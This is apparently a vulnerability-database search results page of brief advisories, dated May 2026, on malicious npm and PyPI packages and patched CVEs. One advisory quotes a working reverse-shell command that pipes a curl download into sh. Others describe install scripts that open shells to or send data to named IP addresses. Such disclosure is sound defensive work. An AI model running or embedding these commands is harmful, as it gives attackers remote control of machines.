Lucene search
K

9549 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/26 8:9 a.m.21 views

Malicious code in @autofleet/rabbit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a766d89a5ed19491bd107e5d31c79fbbe7a9be9bce2a957b290408fb9f54140c The package's compiled entry dist/index.js:48 defines let host = process.env.RABBITMQSERVICEHOST || '35.240.13.28' and then connects via...

5.9AI score
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2026/05/26 12:0 a.m.12 views

SUSE SLES15 Security Update : distribution (SUSE-SU-2026:2032-1)

The remote SUSE Linux SLES15 / SLESSAP15 host has a package installed that is affected by a vulnerability as referenced in the SUSE-SU-2026:2032-1 advisory. This update for distribution rebuilds it against the current go security release. Tenable has extracted the preceding description block...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/25 3:29 p.m.16 views

Malicious code in cch-agent (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cba1bd1e6bb56f0c9816ab482e2ee7cc3a8f04d9e253dd3afa67e4c71b3ae3a2 simpleagent/init.py re-exports ask and chat from simpleagent/client.py. Both entry points ignore caller-supplied configuration and route the caller's...

5.4AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/22 1:24 a.m.16 views

Malicious code in internallib_v493 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...

5.8AI score
Exploits0References3
Tenable Nessus
Tenable Nessus
added 2026/05/22 12:0 a.m.22 views

NVIDIA Windows GPU Display Driver (May 2026)

A display driver installed on the remote Windows host is affected by multiple vulnerabilities: - A vulnerability exists in the kernel mode layer, where an attacker could leverage improper access to GPU resources, potentially leading to code execution, denial of service, escalation of privileges,...

7.8CVSS5.6AI score0.00197EPSS
Exploits0References7
Tenable Nessus
Tenable Nessus
added 2026/05/22 12:0 a.m.16 views

Fedora 44 : kernel (2026-66bba52149)

The remote Fedora 44 host has a package installed that is affected by a vulnerability as referenced in the FEDORA-2026-66bba52149 advisory. The 7.0.9-105/205 stable kernel updates contain a couple if important security fixes. Tenable has extracted the preceding description block directly from the...

5.8AI score
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2026/05/22 12:0 a.m.18 views

RockyLinux 9 : nginx (RLSA-2026:18029)

The remote RockyLinux 9 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2026:18029 advisory. nginx: NGINX: Arbitrary Code Execution Vulnerability CVE-2026-42945 Tenable has extracted the preceding description block directly from the RockyLinux security...

9.2CVSS6.1AI score0.61469EPSS
Exploits40References3
AstraLinux
AstraLinux
added 2026/05/20 5:53 a.m.7 views

Astra Linux – Vulnerability in Ansible

A flaw was discovered in the solariszone module from the Ansible Community modules. When setting the name of the zone on the Solaris host, the zone name is checked by listing the process with the ‘ps’ command on the remote machine. An attacker could exploit this flaw by creating a malicious zone...

7.3CVSS7.3AI score0.00418EPSS
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/20 1:3 a.m.15 views

Malicious code in customerdigital-ui-containers-lib (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a314a5b253dcb30b2781bda216266b7ab1b49b62eec416bd9be07b48ab46a348 On npm install, postinstall.js collects git identity, OS user/uid, hostname, internal network interface addresses, Cloudflare Pages environment...

5.8AI score
Exploits0References2
Tenable Nessus
Tenable Nessus
added 2026/05/20 12:0 a.m.12 views

Ubuntu 16.04 LTS : Smarty vulnerability (USN-8272-1)

The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the USN-8272-1 advisory. Takuya Aramaki discovered that Smarty did not properly escape JavaScript code. An attacker could possibly use this issue to conduct a cross-site scripting attack...

7.1CVSS6.8AI score0.01025EPSS
Exploits0References2
OSV
OSV
added 2026/05/15 3:8 a.m.18 views

MAL-2026-3752 Malicious code in cdp-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dbf55b093e3a93e8d3f536101e62e09cf7e86636cd42813d02f518138cbcb8ed The package ships cdpinject.js, which combines childprocess, fs, http/https, and base64 encoding to gather system information and exfiltrate it over...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/05/14 7:25 p.m.13 views

MAL-2026-3771 Malicious code in request-logger-canary (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cf0d566d7abb400988aea74b00099a6db4c5ea928f32e7d44648193e21a36035 [email protected] ships a preinstall.js that, when npm install runs, opens a TCP socket to 52.74.242.200:8851 and pipes an interactive...

5.9AI score
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2026/05/14 12:0 a.m.15 views

RHEL 10 : osbuild-composer (RHSA-2026:17686)

The remote Redhat Enterprise Linux 10 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2026:17686 advisory. A service for building customized OS artifacts, such as VM images and OSTree commits, that uses osbuild under the hood. Besides building images for...

10CVSS6.9AI score0.00765EPSS
Exploits1References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/12 9:23 p.m.18 views

Malicious code in @gusmano/reext (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 498a21b60dcdfe236ea0b1683e1ec64aa091643b6ad562c3845757eed79660d8 The npm preinstall lifecycle script dist/scripts/preinstall.js, wired via package.json "preinstall": "node./dist/scripts/preinstall.js" reads the...

5.9AI score
Exploits0References34
OSV
OSV
added 2026/05/12 7:43 a.m.12 views

MAL-2026-3694 Malicious code in mymaldependency (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1 MyMalDependencypackage/init.py executes on every import: it calls os.uname and os.getcwd, writes the results to./trans.txt in the installer's working...

6AI score
Exploits0References1
CNNVD
CNNVD
added 2026/05/08 12:0 a.m.12 views

Electerm 参数注入漏洞

Electerm is a SSH/SFTP client developed by ZXDong262 from China, based on Electron. Versions of Electerm 3.8.15 and earlier have a parameter injection vulnerability. This vulnerability arises from the fact that the terminal hyperlink processor does not validate URLs with respect to protocols. Thi...

9.6CVSS6.4AI score0.00394EPSS
Exploits0References1
Tenable Nessus
Tenable Nessus
added 2026/05/07 12:0 a.m.45 views

PHP 8.2.x < 8.2.31 Multiple Vulnerabilities

The version of PHP installed on the remote host is prior to 8.2.31. It is, therefore, affected by multiple vulnerabilities as referenced in the Version 8.2.31 advisory. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number...

9.8CVSS5.8AI score0.0078EPSS
Exploits1References17
Tenable Nessus
Tenable Nessus
added 2026/05/06 12:0 a.m.12 views

Fedora 43 : squid (2026-e6a4814a4d)

The remote Fedora 43 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2026-e6a4814a4d advisory. - new version 7.5 - security update Tenable has extracted the preceding description block directly from the Fedora security advisory. Note that Ness...

9.2CVSS5.8AI score0.08942EPSS
Exploits0References3
Tenable Nessus
Tenable Nessus
added 2026/05/04 12:0 a.m.7 views

RHCOS 2 : openshift-origin-broker (RHSA-2014:0423)

The remote Red Hat Enterprise Linux CoreOS 2 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2014:0423 advisory. - OpenShift: openshift-origin-broker plugin allows impersonation CVE-2014-0188 Note that Nessus has not tested for this issue but has instead...

7.5CVSS5.8AI score0.01667EPSS
Exploits0References5
Tenable Nessus
Tenable Nessus
added 2026/05/04 12:0 a.m.7 views

RHCOS 3 : OpenShift Container Platform 3.10 (RHSA-2018:3549)

The remote Red Hat Enterprise Linux CoreOS 3 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2018:3549 advisory. - kubernetes: authentication/authorization bypass in the handling of non-101 responses CVE-2018-1002105 Note that Nessus has not tested for...

9.8CVSS7.3AI score0.86978EPSS
Exploits10References7
Rows per page
Query Builder